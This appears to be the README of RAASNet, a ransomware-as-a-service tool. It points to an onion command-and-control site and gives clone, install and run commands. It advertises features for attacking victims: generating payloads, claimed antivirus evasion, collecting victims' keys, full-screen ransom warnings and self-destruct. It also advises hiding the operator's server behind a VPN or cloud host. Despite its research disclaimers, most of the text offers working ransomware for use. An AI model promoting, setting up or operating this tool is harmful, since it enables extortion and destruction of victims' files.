RAASNet

Visit our Onion site for a complete C&C !

New Onion Domain:

hplqdv5fo3vw3fjyamyer7yuc7xtvtop2j3fipc7psf3pxvhoqjoqkid.onion

Ransomware As A Service

NOTICE - Update!

GeoIP requirement is no longer used. Server working as intended on Python 3.10, Tested.

Super Fast Encryption!

Usage Demo

Please read

This project was made to demonstrate how easy ransomware are easy to make and how it work. The script works on Windows, Linux and MacOS. It is recommended to compile payload.py to EXE format to make it more portable.

I do work on security awareness trainings and test the IT security and safety for other companies and you guessed it; this was made for the demo section of my presentation, NOT TO EARN MONEY OR BRICK PEOPLES COMPUTERS.

This script does not get detected by any anti-virusses. Self made scripts go undetected 99% of the time. It's easy to write something nasty like ransomware, adware, malware, you name it. Again, this script was for research only. Not ment to be used in the open world. I am not responsible for any damage you may cause with this knowledge.

I recommend using a VPN that allows port forwarding (For example; PIA VPN) when using this outside your network, or better, a cloud computer hosted elsewhere, like Amazon AWS.

The conclusion of this project is that it is easy to brick a system and earn money doing it. This script doesn't use any exploits to achieve its goal, but can easily be coded into it as a nice feature.

Features

• Generate a ransomware payload
• With or without GUI payload (SIDE NOTE: Use console payload (No GUI) if you execute it from a remote system or Terminal.)
• FUD (Fully Undetectable by Anti-Virus)
• Works on Windows, MacOS and Linux
• Super fast encryption with PyCrypto
• Compile to EXE, APP or Unix/Linux executable
• Custom icon for your EXE payload
• Receive keys of victims
• Decrypt files
• Demo mode (payload won't encrypt anything)
• Fullscreen mode (Warning takes over the screen)
• Custom warning message for your victim
• Custom image in your payload
• Ghost mode (Rename by adding .DEMON extention instead of encrypting the files)
• Multiple encryption methods
• Select file extentions to target
• Decide if payload should self-destruct (Console mode feature only)
• Decide wich drive to target for encryption (working directory)
• Verified server access through port forwarding VPN
• Encode payload as Morse code

Installation

Download and install the latest version of Python 3.

Then do:

git clone https://github.com/leonv024/RAASNet.git

pip3 install -r requirements.txt

python3 RAASNet.py

On Linux, you might need to install these packages:

sudo apt install python3-tk python3-pil python3-pil.imagetk

Testing connection with remote server:

# Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
python3 test_socket.py

Disclaimer

I am not responsible for any damage you might cause with this tool. Use at own risk and for testing and learning only! I made this to test AV's and demo purposes only! Use this to avoid ransomware and make better tools against it because current AV tools and ransomware shields are not good enough!